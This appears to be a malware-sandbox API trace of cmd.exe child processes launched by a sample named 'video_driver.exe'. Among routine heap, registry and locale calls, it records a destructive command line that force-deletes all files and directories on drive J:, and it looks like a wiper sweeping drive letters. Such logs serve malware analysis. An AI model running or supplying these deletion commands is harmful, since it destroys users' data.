RtlReAllocateHeap (Heap=0x590000, Flags=0x0, Ptr=0x5a57e0, Size=0x14) returned 0x5a3210 [0067.437] GetProcessHeap () returned 0x590000 [0067.437] RtlSizeHeap (HeapHandle=0x590000, Flags=0x0, MemoryPointer=0x5a3210) returned 0x14 [0067.437] _wcsicmp (_String1="del", _String2=")") returned 59 [0067.437] _wcsicmp (_String1="FOR", _String2="del") returned 2 [0067.437] _wcsicmp (_String1="FOR/?", _String2="del") returned 2 [0067.437] _wcsicmp (_String1="IF", _String2="del") returned 5 [0067.437] _wcsicmp (_String1="IF/?", _String2="del") returned 5 [0067.437] _wcsicmp (_String1="REM", _String2="del") returned 14 [0067.438] _wcsicmp (_String1="REM/?", _String2="del") returned 14 [0067.438] GetProcessHeap () returned 0x590000 [0067.438] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x58) returned 0x5a3230 [0067.438] GetProcessHeap () returned 0x590000 [0067.438] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x10) returned 0x59ffd8 [0067.438] GetProcessHeap () returned 0x590000 [0067.438] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x28) returned 0x5a3290 [0067.439] GetProcessHeap () returned 0x590000 [0067.439] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x58) returned 0x5a32c0 [0067.439] _wcsicmp (_String1="FOR", _String2=")") returned 61 [0067.439] _wcsicmp (_String1="FOR", _String2="FOR") returned 0 [0067.439] _wcsicmp (_String1="FOR/?", _String2="FOR") returned 47 [0067.440] GetProcessHeap () returned 0x590000 [0067.440] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x58) returned 0x5a3320 [0067.440] GetProcessHeap () returned 0x590000 [0067.440] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x44) returned 0x5a3380 [0067.440] GetProcessHeap () returned 0x590000 [0067.440] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x14) returned 0x5a33d0 [0067.440] GetProcessHeap () returned 0x590000 [0067.440] RtlReAllocateHeap (Heap=0x590000, Flags=0x0, Ptr=0x5a33d0, Size=0x12) returned 0x5a33d0 [0067.440] GetProcessHeap () returned 0x590000 [0067.441] RtlSizeHeap (HeapHandle=0x590000, Flags=0x0, MemoryPointer=0x5a33d0) returned 0x12 [0067.441] _wcsicmp (_String1="/L", _String2="/D") returned 8 [0067.441] _wcsicmp (_String1="/D", _String2="/D") returned 0 [0067.441] _wcsicmp (_String1="/L", _String2="%p") returned 10 [0067.441] _wcsicmp (_String1="/D", _String2="%p") returned 10 [0067.441] _wcsicmp (_String1="/F", _String2="%p") returned 10 [0067.441] _wcsicmp (_String1="/R", _String2="%p") returned 10 [0067.441] _wcsicmp (_String1="IN", _String2="IN") returned 0 [0067.442] GetProcessHeap () returned 0x590000 [0067.442] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x12) returned 0x5a33f0 [0067.442] _wcsicmp (_String1="DO", _String2="DO") returned 0 [0067.443] _wcsicmp (_String1="rmdir", _String2=")") returned 73 [0067.443] _wcsicmp (_String1="FOR", _String2="rmdir") returned -12 [0067.443] _wcsicmp (_String1="FOR/?", _String2="rmdir") returned -12 [0067.443] _wcsicmp (_String1="IF", _String2="rmdir") returned -9 [0067.443] _wcsicmp (_String1="IF/?", _String2="rmdir") returned -9 [0067.443] _wcsicmp (_String1="REM", _String2="rmdir") returned -8 [0067.443] _wcsicmp (_String1="REM/?", _String2="rmdir") returned -8 [0067.443] GetProcessHeap () returned 0x590000 [0067.443] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x58) returned 0x5a3410 [0067.443] GetProcessHeap () returned 0x590000 [0067.443] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x14) returned 0x5a3470 [0067.444] GetProcessHeap () returned 0x590000 [0067.444] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x20) returned 0x5a57e0 [0067.446] _wcsicmp (_String1="ELSE", _String2="\n") returned 91 [0067.447] GetFullPathNameW (in: lpFileName="I:", nBufferLength=0x208, lpBuffer=0x2af510, lpFilePart=0x2af2bc | out: lpBuffer="I:\\", lpFilePart=0x2af2bc*=0x0) returned 0x3 [0067.448] wcsncmp (_String1="I:\\", _String2="\\\\.\\", _MaxCount=0x4) returned -19 [0067.453] GetFileAttributesW (lpFileName="I:\\" (normalized: "i:")) returned 0xffffffff [0067.453] _get_osfhandle (_FileHandle=1) returned 0x7 [0067.453] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0067.454] _get_osfhandle (_FileHandle=1) returned 0x7 [0067.454] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a4141ac | out: lpMode=0x4a4141ac) returned 1 [0067.454] _get_osfhandle (_FileHandle=0) returned 0x3 [0067.454] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a4141b0 | out: lpMode=0x4a4141b0) returned 1 [0067.454] SetConsoleInputExeNameW () returned 0x1 [0067.454] GetConsoleOutputCP () returned 0x1b5 [0067.455] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a414260 | out: lpCPInfo=0x4a414260) returned 1 [0067.455] SetThreadUILanguage (LangId=0x0) returned 0x409 [0067.455] exit (_Code=0) Process: id = "54" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x40a6d000" os_pid = "0x90" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x314" cmd_line = "C:\\Windows\\system32\\cmd.exe /c if exist \"J:\" del /f /s /q \"J:\" & FOR /D %p IN (\"J:\") DO rmdir \"%p\" /s /q" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 82 os_tid = 0x6f4 [0067.544] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x39f844 | out: lpSystemTimeAsFileTime=0x39f844*(dwLowDateTime=0x61241a0, dwHighDateTime=0x1d62400)) [0067.544] GetCurrentProcessId () returned 0x90 [0067.544] GetCurrentThreadId () returned 0x6f4 [0067.544] GetTickCount () returned 0x11484f9 [0067.544] QueryPerformanceCounter (in: lpPerformanceCount=0x39f83c | out: lpPerformanceCount=0x39f83c*=18767787088) returned 1 [0067.546] GetModuleHandleA (lpModuleName=0x0) returned 0x4a3f0000 [0067.546] __set_app_type (_Type=0x1) [0067.546] __p__fmode () returned 0x770331f4 [0067.546] __p__commode () returned 0x770331fc [0067.546] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a4121a6) returned 0x0 [0067.546] __getmainargs (in: _Argc=0x4a414238, _Argv=0x4a414240, _Env=0x4a41423c, _DoWildCard=0, _StartInfo=0x4a414140 | out: _Argc=0x4a414238, _Argv=0x4a414240, _Env=0x4a41423c) returned 0 [0067.546] GetCurrentThreadId () returned 0x6f4 [0067.547] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x6f4) returned 0x60 [0067.547] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0067.547] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadUILanguage") returned 0x76d5a84f [0067.547] SetThreadUILanguage (LangId=0x0) returned 0x409 [0067.547] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0067.547] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x39f7d4 | out: phkResult=0x39f7d4*=0x0) returned 0x2 [0067.547] VirtualQuery (in: lpAddress=0x39f80b, lpBuffer=0x39f7a4, dwLength=0x1c | out: lpBuffer=0x39f7a4*(BaseAddress=0x39f000, AllocationBase=0x2a0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0067.547] VirtualQuery (in: lpAddress=0x2a0000, lpBuffer=0x39f7a4, dwLength=0x1c | out: lpBuffer=0x39f7a4*(BaseAddress=0x2a0000, AllocationBase=0x2a0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0067.547] VirtualQuery (in: lpAddress=0x2a1000, lpBuffer=0x39f7a4, dwLength=0x1c | out: lpBuffer=0x39f7a4*(BaseAddress=0x2a1000, AllocationBase=0x2a0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0067.547] VirtualQuery (in: lpAddress=0x2a3000, lpBuffer=0x39f7a4, dwLength=0x1c | out: lpBuffer=0x39f7a4*(BaseAddress=0x2a3000, AllocationBase=0x2a0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0067.548] VirtualQuery (in: lpAddress=0x3a0000, lpBuffer=0x39f7a4, dwLength=0x1c | out: lpBuffer=0x39f7a4*(BaseAddress=0x3a0000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0xf0000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0067.548] GetConsoleOutputCP () returned 0x1b5 [0067.548] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a414260 | out: lpCPInfo=0x4a414260) returned 1 [0067.548] SetConsoleCtrlHandler (HandlerRoutine=0x4a40e72a, Add=1) returned 1 [0067.548] _get_osfhandle (_FileHandle=1) returned 0x7 [0067.548] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0067.548] _get_osfhandle (_FileHandle=1) returned 0x7 [0067.548] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a4141ac | out: lpMode=0x4a4141ac) returned 1 [0067.549] _get_osfhandle (_FileHandle=1) returned 0x7 [0067.549] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0067.549] _get_osfhandle (_FileHandle=0) returned 0x3 [0067.549] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a4141b0 | out: lpMode=0x4a4141b0) returned 1 [0067.549] GetEnvironmentStringsW () returned 0x6120f8* [0067.549] GetProcessHeap () returned 0x600000 [0067.549] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0xaca) returned 0x612bd0 [0067.549] FreeEnvironmentStringsW (penv=0x6120f8) returned 1 [0067.549] GetProcessHeap () returned 0x600000 [0067.550] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x4) returned 0x611898 [0067.550] GetEnvironmentStringsW () returned 0x6120f8* [0067.550] GetProcessHeap () returned 0x600000 [0067.550] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0xaca) returned 0x6136a8 [0067.550] FreeEnvironmentStringsW (penv=0x6120f8) returned 1 [0067.550] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x39e744 | out: phkResult=0x39e744*=0x68) returned 0x0 [0067.550] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x39e74c, lpData=0x39e750, lpcbData=0x39e748*=0x1000 | out: lpType=0x39e74c*=0x0, lpData=0x39e750*=0x0, lpcbData=0x39e748*=0x1000) returned 0x2 [0067.550] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x39e74c, lpData=0x39e750, lpcbData=0x39e748*=0x1000 | out: lpType=0x39e74c*=0x4, lpData=0x39e750*=0x1, lpcbData=0x39e748*=0x4) returned 0x0 [0067.550] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x39e74c, lpData=0x39e750, lpcbData=0x39e748*=0x1000 | out: lpType=0x39e74c*=0x0, lpData=0x39e750*=0x1, lpcbData=0x39e748*=0x1000) returned 0x2 [0067.550] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x39e74c, lpData=0x39e750, lpcbData=0x39e748*=0x1000 | out: lpType=0x39e74c*=0x4, lpData=0x39e750*=0x0, lpcbData=0x39e748*=0x4) returned 0x0 [0067.550] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x39e74c, lpData=0x39e750, lpcbData=0x39e748*=0x1000 | out: lpType=0x39e74c*=0x4, lpData=0x39e750*=0x40, lpcbData=0x39e748*=0x4) returned 0x0 [0067.550] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x39e74c, lpData=0x39e750, lpcbData=0x39e748*=0x1000 | out: lpType=0x39e74c*=0x4, lpData=0x39e750*=0x40, lpcbData=0x39e748*=0x4) returned 0x0 [0067.550] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x39e74c, lpData=0x39e750, lpcbData=0x39e748*=0x1000 | out: lpType=0x39e74c*=0x0, lpData=0x39e750*=0x40, lpcbData=0x39e748*=0x1000) returned 0x2 [0067.550] RegCloseKey (hKey=0x68) returned 0x0 [0067.550] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x39e744 | out: phkResult=0x39e744*=0x68) returned 0x0 [0067.550] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x39e74c, lpData=0x39e750, lpcbData=0x39e748*=0x1000 | out: lpType=0x39e74c*=0x0, lpData=0x39e750*=0x40, lpcbData=0x39e748*=0x1000) returned 0x2 [0067.551] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x39e74c, lpData=0x39e750, lpcbData=0x39e748*=0x1000 | out: lpType=0x39e74c*=0x4, lpData=0x39e750*=0x1, lpcbData=0x39e748*=0x4) returned 0x0 [0067.551] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x39e74c, lpData=0x39e750, lpcbData=0x39e748*=0x1000 | out: lpType=0x39e74c*=0x0, lpData=0x39e750*=0x1, lpcbData=0x39e748*=0x1000) returned 0x2 [0067.551] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x39e74c, lpData=0x39e750, lpcbData=0x39e748*=0x1000 | out: lpType=0x39e74c*=0x4, lpData=0x39e750*=0x0, lpcbData=0x39e748*=0x4) returned 0x0 [0067.551] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x39e74c, lpData=0x39e750, lpcbData=0x39e748*=0x1000 | out: lpType=0x39e74c*=0x4, lpData=0x39e750*=0x9, lpcbData=0x39e748*=0x4) returned 0x0 [0067.551] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x39e74c, lpData=0x39e750, lpcbData=0x39e748*=0x1000 | out: lpType=0x39e74c*=0x4, lpData=0x39e750*=0x9, lpcbData=0x39e748*=0x4) returned 0x0 [0067.551] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x39e74c, lpData=0x39e750, lpcbData=0x39e748*=0x1000 | out: lpType=0x39e74c*=0x0, lpData=0x39e750*=0x9, lpcbData=0x39e748*=0x1000) returned 0x2 [0067.551] RegCloseKey (hKey=0x68) returned 0x0 [0067.551] time (in: timer=0x0 | out: timer=0x0) returned 0x5eb34b6d [0067.551] srand (_Seed=0x5eb34b6d) [0067.551] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /c if exist \"J:\" del /f /s /q \"J:\" & FOR /D %p IN (\"J:\") DO rmdir \"%p\" /s /q" [0067.551] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /c if exist \"J:\" del /f /s /q \"J:\" & FOR /D %p IN (\"J:\") DO rmdir \"%p\" /s /q" [0067.551] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a415260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0067.551] GetProcessHeap () returned 0x600000 [0067.551] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x210) returned 0x6120f8 [0067.552] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x612100, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0067.552] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a420640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0067.552] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a420640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0067.552] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a420640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0067.552] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0067.552] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0067.552] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0067.552] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0067.552] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0067.552] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0067.552] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0067.552] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0067.552] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0067.552] GetProcessHeap () returned 0x600000 [0067.552] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x612bd0 | out: hHeap=0x600000) returned 1 [0067.552] GetEnvironmentStringsW () returned 0x612310* [0067.552] GetProcessHeap () returned 0x600000 [0067.552] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0xae2) returned 0x614c70 [0067.553] FreeEnvironmentStringsW (penv=0x612310) returned 1 [0067.553] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a420640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0067.553] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a420640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0067.553] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0067.553] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0067.553] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0067.553] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0067.553] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0067.553] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0067.553] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0067.553] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0067.553] GetProcessHeap () returned 0x600000 [0067.553] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x54) returned 0x6117c8 [0067.553] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x39f510 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0067.553] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x104, lpBuffer=0x39f510, lpFilePart=0x39f50c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x39f50c*="Desktop") returned 0x25 [0067.553] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0067.553] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x39f28c | out: lpFindFileData=0x39f28c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x615760 [0067.554] FindClose (in: hFindFile=0x615760 | out: hFindFile=0x615760) returned 1 [0067.554] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFindFileData=0x39f28c | out: lpFindFileData=0x39f28c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x22a8020, ftLastAccessTime.dwHighDateTime=0x1d62400, ftLastWriteTime.dwLowDateTime=0x22a8020, ftLastWriteTime.dwHighDateTime=0x1d62400, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 0x615760 [0067.554] FindClose (in: hFindFile=0x615760 | out: hFindFile=0x615760) returned 1 [0067.554] _wcsnicmp (_String1="5P5NRG~1", _String2="5p5NrGJn0jS HALPmcxz", _MaxCount=0x14) returned 20 [0067.554] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFindFileData=0x39f28c | out: lpFindFileData=0x39f28c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x3ff6f00, ftLastAccessTime.dwHighDateTime=0x1d62400, ftLastWriteTime.dwLowDateTime=0x3ff6f00, ftLastWriteTime.dwHighDateTime=0x1d62400, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 0x615760 [0067.554] FindClose (in: hFindFile=0x615760 | out: hFindFile=0x615760) returned 1 [0067.554] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0067.554] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0067.554] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0067.554] GetProcessHeap () returned 0x600000 [0067.554] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x614c70 | out: hHeap=0x600000) returned 1 [0067.554] GetEnvironmentStringsW () returned 0x614180* [0067.555] GetProcessHeap () returned 0x600000 [0067.555] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0xb36) returned 0x615fa0 [0067.555] FreeEnvironmentStringsW (penv=0x614180) returned 1 [0067.555] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a415260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0067.555] GetProcessHeap () returned 0x600000 [0067.555] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6117c8 | out: hHeap=0x600000) returned 1 [0067.555] GetProcessHeap () returned 0x600000 [0067.555] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x400e) returned 0x616ae0 [0067.555] GetProcessHeap () returned 0x600000 [0067.555] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0xa0) returned 0x612e50 [0067.555] GetProcessHeap () returned 0x600000 [0067.555] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x616ae0 | out: hHeap=0x600000) returned 1 [0067.555] GetConsoleOutputCP () returned 0x1b5 [0067.556] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a414260 | out: lpCPInfo=0x4a414260) returned 1 [0067.556] GetUserDefaultLCID () returned 0x409 [0067.556] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a414950, cchData=8 | out: lpLCData=":") returned 2 [0067.557] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x39f650, cchData=128 | out: lpLCData="0") returned 2 [0067.557] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x39f650, cchData=128 | out: lpLCData="0") returned 2 [0067.557] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x39f650, cchData=128 | out: lpLCData="1") returned 2 [0067.557] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a414940, cchData=8 | out: lpLCData="/") returned 2 [0067.557] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a414d80, cchData=32 | out: lpLCData="Mon") returned 4 [0067.557] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a414d40, cchData=32 | out: lpLCData="Tue") returned 4 [0067.557] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a414d00, cchData=32 | out: lpLCData="Wed") returned 4 [0067.557] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a414cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0067.557] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a414c80, cchData=32 | out: lpLCData="Fri") returned 4 [0067.557] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a414c40, cchData=32 | out: lpLCData="Sat") returned 4 [0067.557] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a414c00, cchData=32 | out: lpLCData="Sun") returned 4 [0067.557] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a414930, cchData=8 | out: lpLCData=".") returned 2 [0067.557] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a414920, cchData=8 | out: lpLCData=",") returned 2 [0067.557] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0067.558] GetProcessHeap () returned 0x600000 [0067.558] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x20c) returned 0x612ef8 [0067.558] GetConsoleTitleW (in: lpConsoleTitle=0x612ef8, nSize=0x104 | out: lpConsoleTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\video_driver.exe") returned 0x36 [0067.559] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0067.559] GetProcAddress (hModule=0x76d30000, lpProcName="CopyFileExW") returned 0x76d63b92 [0067.559] GetProcAddress (hModule=0x76d30000, lpProcName="IsDebuggerPresent") returned 0x76d44a5d [0067.559] GetProcAddress (hModule=0x76d30000, lpProcName="SetConsoleInputExeNameW") returned 0x76d5a79d [0067.560] GetProcessHeap () returned 0x600000 [0067.560] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x400a) returned 0x616ae0 [0067.560] GetProcessHeap () returned 0x600000 [0067.560] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x4008) returned 0x61aaf8 [0067.560] GetProcessHeap () returned 0x600000 [0067.560] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x1a) returned 0x6157e0 [0067.560] GetEnvironmentVariableW (in: lpName="p IN (\"J", lpBuffer=0x4a420640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0067.560] _wcsicmp (_String1="p IN (\"J", _String2="CD") returned 13 [0067.560] _wcsicmp (_String1="p IN (\"J", _String2="ERRORLEVEL") returned 11 [0067.560] _wcsicmp (_String1="p IN (\"J", _String2="CMDEXTVERSION") returned 13 [0067.560] _wcsicmp (_String1="p IN (\"J", _String2="CMDCMDLINE") returned 13 [0067.560] _wcsicmp (_String1="p IN (\"J", _String2="DATE") returned 12 [0067.560] _wcsicmp (_String1="p IN (\"J", _String2="TIME") returned -4 [0067.560] _wcsicmp (_String1="p IN (\"J", _String2="RANDOM") returned -2 [0067.560] _wcsicmp (_String1="p IN (\"J", _String2="HIGHESTNUMANODENUMBER") returned 8 [0067.561] GetProcessHeap () returned 0x600000 [0067.561] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6157e0 | out: hHeap=0x600000) returned 1 [0067.561] GetProcessHeap () returned 0x600000 [0067.561] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x61aaf8 | out: hHeap=0x600000) returned 1 [0067.561] GetProcessHeap () returned 